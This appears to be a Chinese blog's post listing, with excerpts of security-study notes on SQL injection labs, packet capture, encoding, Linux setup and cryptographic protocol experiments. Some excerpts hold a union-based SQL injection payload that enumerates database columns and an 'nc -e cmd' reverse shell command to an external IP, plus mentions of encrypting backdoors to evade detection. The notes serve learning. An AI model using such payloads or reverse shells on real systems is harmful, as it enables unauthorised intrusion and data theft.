- 博客(17)
- 收藏
- 关注
RSS订阅原创 SQL注入环境配置
用的是虚拟机,Fedora系统,Fedora的配置在前面有讲本文会介绍nginx、php、mysql的安装及配置,抓包软件OWASP ZAP的安装及配置,火狐浏览器代理的设置,相关插件的安装,SQL注入工具sqlmap的安装。
2024-04-09 15:53:12
949
1
原创 安装MP-SPDZ库前的Ubuntu配置
可以直接定向到ipython了,在命令行中直接运行 pip, pip3, pip3.10, ipython, 和 ipython3 命令,而不会看到警告信息。sudo apt-get install open-vm-tools-desktop//重新安装。vi pip.conf # 用vi编辑pip.conf文件。touch pip.conf # 新建pip.conf文件。- 或者 cd .config/pip。- 或者 mkdir -p .config/pip。
2024-04-04 16:52:34
775
1
原创 SAFEFL: MPC-friendly Framework for Private and Robust Federated Learning论文阅读笔记
传统机器学习(ML):集中收集数据->隐私保护问题privacy-preserving ML (PPML)采用的隐私保护技术:安全多方计算,同态加密(运算成本高)联邦学习(FL):用户本地训练模型,中心聚合器组合结果来更新模型易受2种攻击:1)隐私推断攻击 2)中毒攻击隐私推断攻击破坏模型聚合器的对手试图从更新的本地模型/梯度中推断有关用户隐私数据的敏感信息。对策:安全聚合(SA)技术。用户将加密的本地更新发送到聚合器,聚合器只能访问组合的更新而不是单独的更新。中毒攻击。
2024-03-23 21:46:02
996
原创 在VMware虚拟机搭建Fedora系统及其基本配置
Fedora 是一个基于 Linux 的操作系统,由 Fedora 项目社区开发,并且得到了 Red Hat 的支持。它是一个完全自由的、开放源代码的软件,旨在推动自由和开源软件的发展。
2024-03-21 10:58:12
2577
1
原创 求教!超星视频自动暂停的问题
当鼠标在视频以外操作时,超星视频就会自动暂停,很不方便,不能一边看一遍实操。图标变蓝,然后将鼠标移到视频播放页面,并点击,右边窗口会显示对应的代码。在事件监听器找到mouseout的代码,点击移除。关于超星视频自动暂停的问题。在视频播放网页按F12。点击控制台左上角图标。
2024-03-19 17:23:04
800
1
原创 第4天:基础入门-30余种加密编码进制&Web&数据库&系统&代码&参数值
扫一下网站,发现list.zip文件,解压缩是PHP文件,里面有解密过程代码,搜一下里面的函数作用,是什么加密算法(AES),然后知道了参数值,对应为分组模式(CBC),密码、填充值、偏移量等数据。从output文件夹里看到,zip文件,解压是txt文件,notepad++打开乱码,用记事本打开,然后在线解密就行。应用场景:参数传递(如注入影响),后期WAF绕过干扰写法应用(对后门进行加密,使得检测不出来),视频地址还原等。搭建网站,注册用户,密码存储在数据库中以密文形式,MD5密文形式。
2024-03-14 15:26:40
645
1
原创 SQL注入——红蓝攻防学习
输入1' union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #并提交。由于MySQL版本大于5.0,所以该版本的MySQL有默认的“information_schema”数据库,保存了所有数据库的信息。判断完列数以后,可以看一下是否有显示位,如果有就可以在页面显示需要查询的数据库名、表名等,如果没有显示位置,就直接进行盲注了。
2024-03-07 21:23:22
761
2
原创 第3天:基础入门-抓包&封包&协议&APP&小程序&PC应用&WEB应用
配置模拟器,CCproxy中 socks/mms端口,与ProxyDroid的端口一致9898,手动设置本机局域网地址。抓包是零散的,封包可以复现动作。封包,先暂停抓包,清空历史包数据,打开抓包,进行一个操作,再暂停抓包。(强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂的常用制造工具)包相关的信息(地址),用户信息,和资金相关的信息实测实需要的。一般给目标的IP地址,电脑小程序,手机APP,提取关于该应用的信息。转到测试上去,可以扫描IP端口,存在的资产,端口上有服务有协议。
2024-03-06 22:12:10
835
原创 第2天:基础入门-Web应用&架构搭建&漏洞&HTTP数据包&代理服务器
电脑访问火狐模拟器访问火狐burp suite抓包有些网站PC访问不了,用模拟器访问先抓个包,用burp suite将PC端访问的包替换为模拟器的包(Ctrl CV一下),,只改UA头???通过通过修改数据包内携带用户所用设备信息的字段,以达到绕过某些网站只允许用户使用移动端访问限制的目的burp suite充当proxy,拦截Request和response包forward放包,drop丢包,intercept is on 开启拦截代理服务器 监听 端口设置。
2024-03-06 17:22:10
1071
原创 第1天:基础入门-操作系统&名词&文件下载&反弹Shell&防火墙绕过-小迪安全学习
前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等。外网主机nc -e cmd 171.40.76.231.5577(在浏览器上搜索到ip)将当前的cmd映射到内网网地址端口去(传显)也失败(因为)这个192地址哪都有,外网主机会优先找自己的192地址,找不到该特定内网的192地址。失败(因为)171这个地址不是虚拟机的地址,只是出口(网关)的地址。-> xiaoyu防火墙(入站检测严格)
2024-03-05 23:02:09
618
原创 Circom实验-密码协议形式化分析实验
这里得到的 circuit_0000.zkey 文件不包含任何贡献,不能用于最终电路的证明,因此需要执行前面的贡献更新步骤。更新完成之后,用 verify 命令验证截止至目前为止的ptau(只执行了一次更新,所以验证。下面有一个已部署的智能合约,把上面得到的那一串数字粘贴到verifyProof里面,点一下。命令执行完毕后,可以得到两个json文件,一个是 public.json ,也就是。这里注意一点,每当新的zk-snark需要执行可信设置时,只需要对最新的。
2024-01-14 12:50:15
1001
1
原创 Proverif实验--密码协议形式化分析
needham-Schroeder 协议是Kerberos(Kerberos是执行身份验证和支持安全通信的重要且广泛使用的服务 )的核心组成部分之一,该协议的一个feature是:当A需要同B通信并向KDC发送请求时,KDC并不同时向A,B发送加密后的会话密钥k, 而是向A发送由密钥Ka加密的会话密钥k以及密钥Kb加密的会话密钥k两份密文。8.类似于前一个查询,这个查询表示在A的完整数据结束时的注入事件会导致在A的完整数据开始时的注入事件。同样,这是一个积极的结果,表明系统在保护A的敏感比特串上是成功的。
2024-01-14 12:46:50
1226
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人